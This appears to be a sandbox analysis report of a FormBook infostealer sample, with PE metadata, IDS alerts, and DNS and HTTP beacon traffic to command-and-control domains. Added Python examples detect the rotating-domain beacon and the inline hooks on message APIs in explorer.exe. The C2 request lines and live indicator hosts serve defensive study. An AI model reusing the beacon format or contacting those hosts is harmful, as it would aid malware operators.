                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                                                                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                                                                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                                                                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb2c1a | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb4000 | 0x5dc | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb1800 | 0x3608 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb6000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xaed2c | 0x70 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xb0c74 | 0xb0e00 | 5ba4a2c4b75c26bb43235e1cdc3c5170 | False | 0.8472435401943463 | data | 7.646714228019074 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xb4000 | 0x5dc | 0x600 | 14053a073b47d96d5fef0ae638cd3229 | False | 0.4388020833333333 | data | 4.186995658519555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xb6000 | 0xc | 0x200 | 1306fa69cde1f5307f16e32de3dd14d4 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0xb4090 | 0x34c | data | | | 0.4372037914691943 |
| RT_MANIFEST | 0xb43ec | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-30T18:17:01.206547+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49727 | 185.26.122.70 | 80 | TCP |
| 2024-09-30T18:17:01.206547+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49727 | 185.26.122.70 | 80 | TCP |
| 2024-09-30T18:17:01.206547+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49727 | 185.26.122.70 | 80 | TCP |
| 2024-09-30T18:20:05.308366+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49733 | 188.114.96.3 | 80 | TCP |
| 2024-09-30T18:20:05.308366+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49733 | 188.114.96.3 | 80 | TCP |
| 2024-09-30T18:20:05.308366+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49733 | 188.114.96.3 | 80 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Sep 30, 2024 18:17:00.684269905 CEST | 49727 | 80 | 192.168.2.6 | 185.26.122.70 |
| Sep 30, 2024 18:17:00.689624071 CEST | 80 | 49727 | 185.26.122.70 | 192.168.2.6 |
| Sep 30, 2024 18:17:00.689723015 CEST | 49727 | 80 | 192.168.2.6 | 185.26.122.70 |
| Sep 30, 2024 18:17:00.691968918 CEST | 49727 | 80 | 192.168.2.6 | 185.26.122.70 |
| Sep 30, 2024 18:17:00.698883057 CEST | 80 | 49727 | 185.26.122.70 | 192.168.2.6 |
| Sep 30, 2024 18:17:01.201049089 CEST | 49727 | 80 | 192.168.2.6 | 185.26.122.70 |
| Sep 30, 2024 18:17:01.206494093 CEST | 80 | 49727 | 185.26.122.70 | 192.168.2.6 |
| Sep 30, 2024 18:17:01.206547022 CEST | 49727 | 80 | 192.168.2.6 | 185.26.122.70 |
| Sep 30, 2024 18:20:04.807838917 CEST | 49733 | 80 | 192.168.2.6 | 188.114.96.3 |
| Sep 30, 2024 18:20:04.812650919 CEST | 80 | 49733 | 188.114.96.3 | 192.168.2.6 |
| Sep 30, 2024 18:20:04.813429117 CEST | 49733 | 80 | 192.168.2.6 | 188.114.96.3 |
| Sep 30, 2024 18:20:04.813530922 CEST | 49733 | 80 | 192.168.2.6 | 188.114.96.3 |
| Sep 30, 2024 18:20:04.818751097 CEST | 80 | 49733 | 188.114.96.3 | 192.168.2.6 |
| Sep 30, 2024 18:20:05.306699991 CEST | 80 | 49733 | 188.114.96.3 | 192.168.2.6 |
| Sep 30, 2024 18:20:05.307007074 CEST | 49733 | 80 | 192.168.2.6 | 188.114.96.3 |
| Sep 30, 2024 18:20:05.308254004 CEST | 80 | 49733 | 188.114.96.3 | 192.168.2.6 |
| Sep 30, 2024 18:20:05.308366060 CEST | 49733 | 80 | 192.168.2.6 | 188.114.96.3 |
| Sep 30, 2024 18:20:05.311872959 CEST | 80 | 49733 | 188.114.96.3 | 192.168.2.6 |
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Sep 30, 2024 18:16:39.108560085 CEST  57406        53         192.168.2.6  1.1.1.1
Sep 30, 2024 18:16:39.199477911 CEST  53           57406      1.1.1.1      192.168.2.6
Sep 30, 2024 18:17:00.579710007 CEST  57909        53         192.168.2.6  1.1.1.1
Sep 30, 2024 18:17:00.674328089 CEST  53           57909      1.1.1.1      192.168.2.6
Sep 30, 2024 18:17:40.133903027 CEST  51363        53         192.168.2.6  1.1.1.1
Sep 30, 2024 18:17:40.143837929 CEST  53           51363      1.1.1.1      192.168.2.6
Sep 30, 2024 18:18:00.689377069 CEST  60136        53         192.168.2.6  1.1.1.1
Sep 30, 2024 18:18:00.724766016 CEST  53           60136      1.1.1.1      192.168.2.6
Sep 30, 2024 18:18:21.201798916 CEST  51531        53         192.168.2.6  1.1.1.1
Sep 30, 2024 18:18:21.216984034 CEST  53           51531      1.1.1.1      192.168.2.6
Sep 30, 2024 18:18:41.714139938 CEST  57076        53         192.168.2.6  1.1.1.1
Sep 30, 2024 18:18:41.724505901 CEST  53           57076      1.1.1.1      192.168.2.6
Sep 30, 2024 18:19:02.626411915 CEST  51163        53         192.168.2.6  1.1.1.1
Sep 30, 2024 18:19:02.721574068 CEST  53           51163      1.1.1.1      192.168.2.6
Sep 30, 2024 18:19:23.086381912 CEST  59558        53         192.168.2.6  1.1.1.1
Sep 30, 2024 18:19:23.097445965 CEST  53           59558      1.1.1.1      192.168.2.6
Sep 30, 2024 18:19:43.841934919 CEST  56828        53         192.168.2.6  1.1.1.1
Sep 30, 2024 18:19:43.873985052 CEST  53           56828      1.1.1.1      192.168.2.6
Sep 30, 2024 18:20:04.762689114 CEST  57944        53         192.168.2.6  1.1.1.1
Sep 30, 2024 18:20:04.782607079 CEST  53           57944      1.1.1.1      192.168.2.6
Sep 30, 2024 18:20:26.467030048 CEST  56924        53         192.168.2.6  1.1.1.1
Sep 30, 2024 18:20:26.484256983 CEST  53           56924      1.1.1.1      192.168.2.6
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                               Type            Class        DNS over HTTPS
Sep 30, 2024 18:16:39.108560085 CEST  192.168.2.6  1.1.1.1  0x4cdd    Standard query (0)  www.uijiuw.top                     A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:17:00.579710007 CEST  192.168.2.6  1.1.1.1  0x65f2    Standard query (0)  www.oko.events                     A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:17:40.133903027 CEST  192.168.2.6  1.1.1.1  0x95b0    Standard query (0)  www.hecreature.tech                A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:18:00.689377069 CEST  192.168.2.6  1.1.1.1  0xd864    Standard query (0)  www.ealerslot.net                  A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:18:21.201798916 CEST  192.168.2.6  1.1.1.1  0x2a2a    Standard query (0)  www.aithful.events                 A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:18:41.714139938 CEST  192.168.2.6  1.1.1.1  0x93e9    Standard query (0)  www.amilablackwell.online          A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:19:02.626411915 CEST  192.168.2.6  1.1.1.1  0x5f03    Standard query (0)  www.eviewmadu.top                  A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:19:23.086381912 CEST  192.168.2.6  1.1.1.1  0x3e36    Standard query (0)  www.khizmetlergirisyapzzz2024.net  A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:19:43.841934919 CEST  192.168.2.6  1.1.1.1  0x986d    Standard query (0)  www.23fd595ig.autos                A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:20:04.762689114 CEST  192.168.2.6  1.1.1.1  0x9a2e    Standard query (0)  www.j88.travel                     A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:20:26.467030048 CEST  192.168.2.6  1.1.1.1  0xa1a3    Standard query (0)  www.venir-bienne.info              A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code      Name                               CName  Address        Type            Class        DNS over HTTPS
Sep 30, 2024 18:16:39.199477911 CEST  1.1.1.1    192.168.2.6  0x4cdd    Name error (3)  www.uijiuw.top                     none   none           A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:17:00.674328089 CEST  1.1.1.1    192.168.2.6  0x65f2    No error (0)    www.oko.events                     none   185.26.122.70  A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:17:40.143837929 CEST  1.1.1.1    192.168.2.6  0x95b0    Name error (3)  www.hecreature.tech                none   none           A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:18:00.724766016 CEST  1.1.1.1    192.168.2.6  0xd864    Name error (3)  www.ealerslot.net                  none   none           A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:18:21.216984034 CEST  1.1.1.1    192.168.2.6  0x2a2a    Name error (3)  www.aithful.events                 none   none           A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:18:41.724505901 CEST  1.1.1.1    192.168.2.6  0x93e9    Name error (3)  www.amilablackwell.online          none   none           A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:19:02.721574068 CEST  1.1.1.1    192.168.2.6  0x5f03    Name error (3)  www.eviewmadu.top                  none   none           A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:19:23.097445965 CEST  1.1.1.1    192.168.2.6  0x3e36    Name error (3)  www.khizmetlergirisyapzzz2024.net  none   none           A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:19:43.873985052 CEST  1.1.1.1    192.168.2.6  0x986d    Name error (3)  www.23fd595ig.autos                none   none           A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:20:04.782607079 CEST  1.1.1.1    192.168.2.6  0x9a2e    No error (0)    www.j88.travel                     none   188.114.96.3   A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:20:04.782607079 CEST  1.1.1.1    192.168.2.6  0x9a2e    No error (0)    www.j88.travel                     none   188.114.97.3   A (IP address)  IN (0x0001)  false
Sep 30, 2024 18:20:26.484256983 CEST  1.1.1.1    192.168.2.6  0xa1a3    Name error (3)  www.venir-bienne.info              none   none           A (IP address)  IN (0x0001)  false
                                                                                                                                                                                                                    • www.oko.events
                                                                                                                                                                                                                    • www.j88.travel
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49727        185.26.122.70   80                4004  C:\Windows\explorer.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 30, 2024 18:17:00.691968918 CEST  162                OUT        GET /c24t/?I6=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbC02dv5lpT+B1+jbQ==&AL0=9rN46F HTTP/1.1
Host: www.oko.events
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.6  49733        188.114.96.3    80                4004  C:\Windows\explorer.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 30, 2024 18:20:04.813530922 CEST  162                OUT        GET /c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F HTTP/1.1
Host: www.j88.travel
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 30, 2024 18:20:05.306699991 CEST  925                IN         HTTP/1.1 301 Moved Permanently
Date: Mon, 30 Sep 2024 16:20:05 GMT
Content-Type: text/html
Content-Length: 167
Connection: close
Cache-Control: max-age=3600
Expires: Mon, 30 Sep 2024 17:20:05 GMT
Location: https://www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dtQZ0n1Te09ZkD2spq2aiE3h3PUQxrmvY%2BsttoWPNruT2ecTboh6HC%2BbK89TtwwjWuaqhIIB1Cmqqei%2B3kl8RJvawnPt5PzSzJ3AKOjWgWIgF6tWpehHBIX%2BUSn82AwZUw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Speculation-Rules: "/cdn-cgi/speculation"
Server: cloudflare
CF-RAY: 8cb589ccb8fd8cd6-EWR
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
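
The two sessions above are the sample's beacon traffic, and they carry the points a network detection should key on: both GET requests are issued by explorer.exe (PID 4004), not by docs.exe, which matches the process-injection signatures in the overview; both use the same /c24t/ directory and the same trailing &AL0=9rN46F parameter against different hosts; both send Connection: close; and the only reply captured is Cloudflare's generic 301 to HTTPS, with no HTTPS follow-up in the session list. Read together with the DNS tables, where nine of eleven names queried at a roughly 20-second cadence come back NXDOMAIN and the requests go only to the two that resolved, the traffic has the shape of a rotating-domain beacon. The block below is an added example, not code from the report or from Joe Sandbox: it parses records constructed from the tables above and produces that verdict. The regex length bounds and the thresholds in correlate() are my assumptions for generalizing beyond the two observed requests, not a published signature.

```python
import re
from datetime import datetime
from statistics import median

# Constructed from the DNS answer table and the two HTTP sessions above.
# The tuple layout is my own; it is not Joe Sandbox's export format.
DNS_ANSWERS = [
    # (timestamp as printed in the report, name, reply code, address or None)
    ("Sep 30, 2024 18:16:39.199477911 CEST", "www.uijiuw.top", "Name error (3)", None),
    ("Sep 30, 2024 18:17:00.674328089 CEST", "www.oko.events", "No error (0)", "185.26.122.70"),
    ("Sep 30, 2024 18:17:40.143837929 CEST", "www.hecreature.tech", "Name error (3)", None),
    ("Sep 30, 2024 18:18:00.724766016 CEST", "www.ealerslot.net", "Name error (3)", None),
    ("Sep 30, 2024 18:18:21.216984034 CEST", "www.aithful.events", "Name error (3)", None),
    ("Sep 30, 2024 18:18:41.724505901 CEST", "www.amilablackwell.online", "Name error (3)", None),
    ("Sep 30, 2024 18:19:02.721574068 CEST", "www.eviewmadu.top", "Name error (3)", None),
    ("Sep 30, 2024 18:19:23.097445965 CEST", "www.khizmetlergirisyapzzz2024.net", "Name error (3)", None),
    ("Sep 30, 2024 18:19:43.873985052 CEST", "www.23fd595ig.autos", "Name error (3)", None),
    ("Sep 30, 2024 18:20:04.782607079 CEST", "www.j88.travel", "No error (0)", "188.114.96.3"),
    ("Sep 30, 2024 18:20:04.782607079 CEST", "www.j88.travel", "No error (0)", "188.114.97.3"),
    ("Sep 30, 2024 18:20:26.484256983 CEST", "www.venir-bienne.info", "Name error (3)", None),
]

HTTP_SESSIONS = [
    # (originating process, destination IP, raw request as captured)
    ("C:\\Windows\\explorer.exe", "185.26.122.70",
     "GET /c24t/?I6=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbC02dv5lpT+B1+jbQ==&AL0=9rN46F HTTP/1.1\r\n"
     "Host: www.oko.events\r\nConnection: close\r\n\r\n"),
    ("C:\\Windows\\explorer.exe", "188.114.96.3",
     "GET /c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F HTTP/1.1\r\n"
     "Host: www.j88.travel\r\nConnection: close\r\n\r\n"),
]

# Shape of the two observed request lines, generalized: a short directory, one short
# key carrying a long base64 blob, one short key carrying a short tag. The length
# ranges are my assumption, not a published signature.
BEACON_RE = re.compile(
    r"^GET /(?P<dir>[A-Za-z0-9]{2,8})/\?(?P<k1>[A-Za-z0-9]{1,4})=(?P<blob>[A-Za-z0-9+/=]{40,})"
    r"&(?P<k2>[A-Za-z0-9]{1,4})=(?P<tag>[A-Za-z0-9]{4,8}) HTTP/1\.[01]$"
)


def parse_ts(s):
    """Parse 'Sep 30, 2024 18:16:39.199477911 CEST'; nanoseconds are truncated to microseconds."""
    main, frac = s.rsplit(" ", 1)[0].split(".")
    return datetime.strptime(main, "%b %d, %Y %H:%M:%S").replace(microsecond=int(frac[:6]))


def rotation_stats(answers):
    """Summarize the client's lookup sequence: distinct names, share that never resolved,
    and the median spacing between first lookups (one entry per name)."""
    first_seen, resolved = {}, {}
    for ts, name, rcode, addr in answers:
        first_seen.setdefault(name, parse_ts(ts))
        if rcode.startswith("No error") and addr:
            resolved.setdefault(name, set()).add(addr)
    times = list(first_seen.values())
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    n = len(first_seen)
    return {
        "distinct_names": n,
        "unresolved_ratio": (n - len(resolved)) / n,
        "median_gap_s": median(gaps) if gaps else 0.0,
        "resolved": resolved,
    }


def parse_request(raw):
    """Split a raw HTTP/1.x request into its request line and a lower-cased header dict."""
    head = raw.partition("\r\n\r\n")[0].split("\r\n")
    headers = {}
    for line in head[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return head[0], headers


def classify_request(process, raw):
    """Return the beacon fields if the request has the observed shape, else None."""
    request_line, headers = parse_request(raw)
    m = BEACON_RE.match(request_line)
    if not m or headers.get("connection", "").lower() != "close":
        return None
    return {
        "host": headers.get("host", ""),
        "dir": m["dir"], "tag": m["tag"], "blob_len": len(m["blob"]),
        "from_explorer": process.lower().endswith("\\explorer.exe"),
    }


def correlate(answers, sessions):
    """Tie beacon-shaped requests back to the DNS rotation and produce a verdict."""
    stats = rotation_stats(answers)
    hits = []
    for process, dst, raw in sessions:
        c = classify_request(process, raw)
        # Count a request only if the Host it names resolved to the IP it was sent to.
        if c and dst in stats["resolved"].get(c["host"], set()):
            hits.append(c)
    dirs = {h["dir"] for h in hits}
    tags = {h["tag"] for h in hits}
    verdict = (
        len(hits) >= 2 and len(dirs) == 1 and len(tags) == 1
        and all(h["from_explorer"] for h in hits)
        and stats["distinct_names"] >= 5 and stats["unresolved_ratio"] >= 0.5
    )
    return {"hits": hits, "shared_dir": dirs, "shared_tag": tags,
            "stats": stats, "formbook_like": verdict}
```

On the report's data this yields two hits sharing dir c24t and tag 9rN46F, eleven distinct names with an unresolved ratio of 9/11, and a median gap of about 20.8 s; the one longer gap (about 39 s) follows the first name that resolved. The DNS-to-destination check matters in practice: it discards HTTP to an IP the host never looked up, and it keeps both A records for www.j88.travel so the request to 188.114.96.3 still correlates.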


Code Manipulations

Function Name  Hook Type  Active in Processes
PeekMessageA   INLINE     explorer.exe
PeekMessageW   INLINE     explorer.exe
GetMessageW    INLINE     explorer.exe
GetMessageA    INLINE     explorer.exe

Function Name  Hook Type  New Data
PeekMessageA   INLINE     0x48 0x8B 0xB8 0x86 0x6E 0xED
PeekMessageW   INLINE     0x48 0x8B 0xB8 0x8E 0xEE 0xED
GetMessageW    INLINE     0x48 0x8B 0xB8 0x8E 0xEE 0xED
GetMessageA    INLINE     0x48 0x8B 0xB8 0x86 0x6E 0xED
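
The table records that the first bytes of PeekMessageA/W and GetMessageA/W inside explorer.exe no longer match the module image; these are the message-loop APIs through which window messages, keystrokes included, reach an application, which is where a user-mode keylogger would sit. The practical check for this class of finding is a byte diff of each exported function's prologue against the on-disk (or otherwise known-clean) module, with classification of the detour stub only as a secondary step. The block below is an added example, not Joe Sandbox's own logic: it uses the six bytes from the table as the in-memory side, a constructed MSVC-style prologue as the reference side (not the real bytes of these functions), and synthetic addresses, since the report lists no RVAs.

```python
import struct

# First six bytes of each hooked function in explorer.exe, as printed in the
# Code Manipulations table above.
HOOKED_PROLOGUES = {
    "PeekMessageA": bytes.fromhex("488bb8866eed"),
    "PeekMessageW": bytes.fromhex("488bb88eeeed"),
    "GetMessageW":  bytes.fromhex("488bb88eeeed"),
    "GetMessageA":  bytes.fromhex("488bb8866eed"),
}

# Stand-in for what the on-disk user32.dll would hold at the same offsets: a
# typical MSVC x64 prologue (mov [rsp+8],rbx; mov [rsp+0x10],rsi), constructed
# for this example. It is not the real prologue of these functions.
REFERENCE_PROLOGUE = bytes.fromhex("48895c24084889742410")

MASK64 = (1 << 64) - 1


def classify_detour(code, va):
    """Recognize the common x64 inline-hook stubs at the start of `code`, assumed to be
    mapped at virtual address `va`. Returns (kind, branch target) or ("unknown", None)."""
    if len(code) >= 5 and code[0] == 0xE9:                        # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp rel32", (va + 5 + rel) & MASK64
    if len(code) >= 6 and code[:2] == b"\xff\x25":                 # jmp qword [rip+disp32]
        disp = struct.unpack_from("<i", code, 2)[0]
        return "jmp [rip+disp32]", (va + 6 + disp) & MASK64        # address of the pointer slot
    if len(code) >= 12 and code[:2] == b"\x48\xb8" and code[10:12] == b"\xff\xe0":
        return "mov rax, imm64; jmp rax", struct.unpack_from("<Q", code, 2)[0]
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:     # push imm32; ret
        return "push imm32; ret", struct.unpack_from("<I", code, 1)[0]
    return "unknown", None


def check_function(name, reference, in_memory, va):
    """Diff the in-memory prologue against the reference image over the bytes both
    sides have; classify the stub only when they differ."""
    n = min(len(reference), len(in_memory))
    if n == 0 or reference[:n] == in_memory[:n]:
        return {"function": name, "hooked": False}
    kind, target = classify_detour(in_memory, va)
    return {"function": name, "hooked": True, "detour": kind, "target": target}


def scan(prologues, reference, base_va=0x7FF8_0000_0000):
    """Run the check over a table of function -> in-memory bytes. The per-function
    addresses are synthetic (base + 0x100*i) because the report gives no RVAs."""
    return [check_function(name, reference, code, base_va + 0x100 * i)
            for i, (name, code) in enumerate(prologues.items())]
```

Run over the four entries this flags all of them, and for all of them the classifier returns "unknown": the six reported bytes (48 8B B8 ...) match none of the canonical detour stubs, so a detector that only signature-matches stubs would miss this hook, while the plain diff catches it. A real implementation reads the prologue with ReadProcessMemory, maps the same DLL from disk, applies base relocations to the reference before comparing, and compares a fixed window (16 bytes is common) rather than the six the report happens to print.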

                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                    Start time:12:16:00
                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\docs.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\docs.exe"
                                                                                                                                                                                                                    Imagebase:0xac0000
                                                                                                                                                                                                                    File size:740'872 bytes
                                                                                                                                                                                                                    MD5 hash:136DCC6497B13FE87BBAD4AA5F859593
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
